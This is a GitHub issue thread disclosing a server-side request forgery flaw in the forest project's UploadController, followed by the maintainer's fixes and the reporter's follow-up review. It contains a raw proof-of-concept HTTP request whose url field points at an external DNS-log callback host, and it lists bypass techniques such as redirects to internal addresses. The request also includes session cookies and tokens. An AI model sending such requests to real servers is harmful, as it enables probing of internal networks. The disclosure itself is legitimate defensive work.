### ISSUE TITLE
Server-side-request-forgery (SSRF) vulnerability allow  registered users to  Vulnerability in com.rymcu.forest.web.api.common.UploadController（UploadControlle.java存在ssrf漏洞）

### ISSUE THREAD

**Issue by shellfeel** [rymcu/forest#149]
### 1.1 Pull the latest code and set up a test environment（拉取最新代码，搭建测试环境）
Register a user using the system's registration function （使用系统的注册功能，注册一个用户）
![image](https://github.com/rymcu/forest/assets/18633010/e81c7888-485b-4f04-9a12-a598bdbb5b9e)
### 1.2 Construct a request using the token of the registered user, and fill in the malicious address in the request parameter url.（用注册用户的token构造请求 ,在请求参数url中填写恶意地址）
```
POST /api/upload/file/link HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Upload-Token: eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJ0ZXN0Iiwic3ViIjoidGVzdCIsImlhdCI6MTcwMjg3MTg1MX0.52fneB5s417LkY67Ry95657YCvlWcng6S3PekvvkEdA
Content-Type: application/json
Content-Length: 50
Origin: http://127.0.0.1:3000
Connection: close
Referer: http://127.0.0.1:3000/article/post
Cookie: SESSION=062279af-c20d-4004-b5e2-23e2196c52f5; auth.strategy=local; auth._token.local=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJhZG1pbiIsInN1YiI6ImFkbWluIiwiaWF0IjoxNzAyNTQ2MTkzfQ.1aL69-kqpkwV9Xu4BOf7takNHUmhp3PzDtOGseXHr-o; auth._token_expiration.local=1702547093332; auth._refresh_token.local=01HHKTJEW0EQ8FD9GCSZ6X5ZT4; auth._refresh_token_expiration.local=1702553393333
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"url":"http://456.v0e01kal.eyes.sh","type":"567"}
```
![image](https://github.com/rymcu/forest/assets/18633010/1c2eee7c-5dfd-4ca8-9c71-acb1d7a98709)
### 1.3 DNSLOG successfully receives the request, proving that the vulnerability exists（DNSLOG 成功收到请求，证明漏洞存在）
![image](https://github.com/rymcu/forest/assets/18633010/b7f33984-a880-4bb4-9016-2a0507586350)
The test intranet address also received the request successfully:（测试内网地址也成功收到请求：）
![image](https://github.com/rymcu/forest/assets/18633010/688f81a9-024b-4dd0-b28e-49f0ecfe0db8)
<img width="795" alt="image" src="https://github.com/rymcu/forest/assets/18633010/971aed78-d9d2-4b52-a09f-bf98b1a7c8b5">

## 2. Vulnerability Existence Source Code Analysis（漏洞存在源码分析）
src/main/java/com/rymcu/forest/web/api/common/UploadController.java The method does not limit the user parameter url, resulting in access to arbitrary intranet addresses（方法中未对用户参数url做限制，导致能访问任意的内网地址）
![image](https://github.com/rymcu/forest/assets/18633010/d04d6abb-dc04-4b2d-a5be-637b36b61f6d)

## 3. affected version （受影响版本）

This ssrf affects the latest version of the curren（这个ssrf影响目前的最新版本）
## 4. fixes Recommendations (修复建议)
For fix this vuln， Here is my advices:
1. Input validation and filtering: Strict validation and filtering of all user input URLs or data. Validate the format and protocol of URL parameters and allow only trusted protocols such as HTTP and HTTPS.
2. Whitelisting mechanism: Consider implementing a whitelisting mechanism to allow access only to specific domain names or IP addresses. Avoid dynamically constructed URLs, especially from user-controlled input.

为了修复这个漏洞，我有以下建议：
1. 输入验证和过滤：对所有用户输入的URL或数据进行严格验证和过滤。验证URL参数的格式和协议，只允许受信任的协议，如HTTP和HTTPS。
2. 白名单机制：考虑实施白名单机制，仅允许访问特定域名或IP地址。避免动态构建URL，特别是从用户控制的输入。

**Comment by ronger-x** [comment]
非常抱歉, 最近在忙其他事情没有关注 issue, 感谢你的反馈, 会尽快修复此问题

**Comment by ronger-x** [comment]
已提交修复代码, 期望帮忙验证问题是否还存在

**Comment by shellfeel** [comment]
我单元测试了下作者的代码，逻辑感觉写反了？ 另外要完整限制内网ip的访问可能还得防范
1. 地址302重定向为内网地址
2. 域名解析的ip地址为内网ip
3. 内网ipv6地址
![image](https://github.com/rymcu/forest/assets/18633010/1d99ed8f-e179-43f8-8bd3-a4c7c656d933)

**Comment by ronger-x** [comment]
内网地址的逻辑判断确实写反了, 已修正

**Comment by shellfeel** [comment]
现在这样确实能一定程度上防御ssrf，但正常的域名访问是不是也受影响了，ipv4转换成字节的是否如果是字符串域名会报null，逻辑走不到白名单
![image](https://github.com/rymcu/forest/assets/18633010/1a553438-2600-4ffd-86d8-71b9d4106931)
![image](https://github.com/rymcu/forest/assets/18633010/49fd8d1f-0922-4f2f-a9e8-e0b48cd8af6b)

**Comment by ronger-x** [comment]
已增加对当前 host 是否为 IPv4 和 IPv6 地址的判断
